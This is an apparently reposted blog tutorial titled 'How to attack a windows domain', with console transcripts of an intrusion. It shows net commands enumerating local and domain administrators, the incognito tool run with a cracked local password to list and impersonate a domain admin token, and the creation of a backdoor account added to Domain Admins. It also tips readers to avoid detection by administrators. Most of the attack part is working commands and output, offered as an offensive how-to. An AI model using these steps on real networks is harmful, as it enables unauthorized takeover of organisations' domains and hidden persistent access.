How to attack a windows domain
2013-08-04 22:50
369 查看
How to attack a windows domain
分类: 网络技术2013-06-24 16:1919人阅读评论(0)收藏举报I recommend double clicking the video and watching it in full screen so its somewhat legible. This video walks through an example of attacking a windows domain. This post also contains a textual walk through.V.Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IPs or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.You can also browse the network neighborhood or use the net view command.Aquiring and cracking the hashes of your target is generally useful as well.Enumerate group membership so you know who to target.Get the usernames in the local administrators group:C:WINDOWSsystem32>net localgroup administratorsnet localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domainMembers
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.
Enumerate the domain adminsC:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.Group name Domain Admins
Comment Designated administrators of the domainMembers---------------------------------------------------
admin_valsmith Administrator
The command completed successfully.
So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process[*] Enumerating tokens
[*] Listing unique users found...Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmithImpersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON[*] Service shutdown detected. Service executable file deleted
[*] Deleting service
So admin_valsmith is our target domain administrator and an impersonation token is available to us!The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.Next we will utilize this token to gain domain admin rights:
C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:WINDOWSsystem32>whoami
whoami
admin_valsmith
So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:C: et user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.The command completed successfully.Now we want to add our account to the domain admin group. NOTE: often you dont want to add an account, especially one named hacked as it is likely to be discovered by the admins.
C: et group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.comThe command completed successfully.At this point we have control over the domain and can likely log into any workstation which is on the domain.
相关文章推荐
- How to attack a windows domain
- How to attack a windows domain
- How to attack a windows domain
- How to attack a windows domain
- How to integrate custom security policy with Windows domain authentication in ASP.NET
- How to join a Ubuntu to Windows Domain
- How to own a Windows Domain
- How to hijack domain name in windows - 如何实现 Windows 本地域名劫持
- [reproduce]How to Create Domain in Windows Server 2012.
- How to integrate custom security policy into Windows domain authentication
- How to Join a Windows Media Center PC to a Domain
- How to reset the Domain Admin Password under Windows Server 2003
- How to use the Install from Media feature to promote Windows Server 2003-based domain controllers
- How to use Serial Port in Windows
- How-To Index for Windows Phone
- How To Default To Search Companion With Windows Desktop Search
- How To Monitor Remote Windows Machine Using Nagios on Linux
- How To Release and/or Renew IP Addresses on Windows XP | 2000 | NT
- How to compile caffe on Windows 10
- how to install subversion(svn) with eclipse on windows